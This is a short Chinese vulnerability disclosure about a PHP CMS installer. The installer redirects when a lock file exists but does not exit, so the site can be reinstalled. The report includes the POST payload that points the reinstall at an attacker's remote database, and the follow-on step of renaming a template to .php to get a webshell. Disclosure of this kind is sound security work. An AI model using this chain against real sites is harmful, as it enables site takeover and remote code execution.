### 简要描述:
rt.最近流行路人甲。
### 详细说明:
看到
install\index.php
```
<?php
header("Content-type:text/html;charset=utf-8");
include_once('./function.php');
define('ROOT',dirname(dirname(__FILE__)));
$verMsg = 'v3.8';
$s_lang = 'utf-8';
$source_file = "./source/config.ini.php";//源配置文件
$target_file="../Public/Config/config.ini.php"; //目标配置文件。
$lock_file = '../install.lck';//锁定文件
if(file_exists($lock_file)){header('Location:../index.php');}
```
判断 install.lck是否存在。 然而只是做了 header, 并没有exit。 页面只是跳转了,但是后面的代码还是会继续执行的。
攻击者可以 在自己的服务器上开放mysql数据库外联。然后对这个页面post数据
```
step=4&dbhost=远程服务器ip&dbport=端口&dbuser=账户&dbpwd=密码&dbname=数据库名
```
就可以重装这个cms了。
然后使用默认密码进入后台,
/admin.php?s=/Tpl/Update
将模板后缀命名为 php 即可getshell。
[<img src="https://images.seebug.org/upload/201410/280253584cb04426c33138386ef28fc4e3fc223d.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201410/280253584cb04426c33138386ef28fc4e3fc223d.jpg)
### 漏洞证明:
如上所述。官网就不测试了。
暂无评论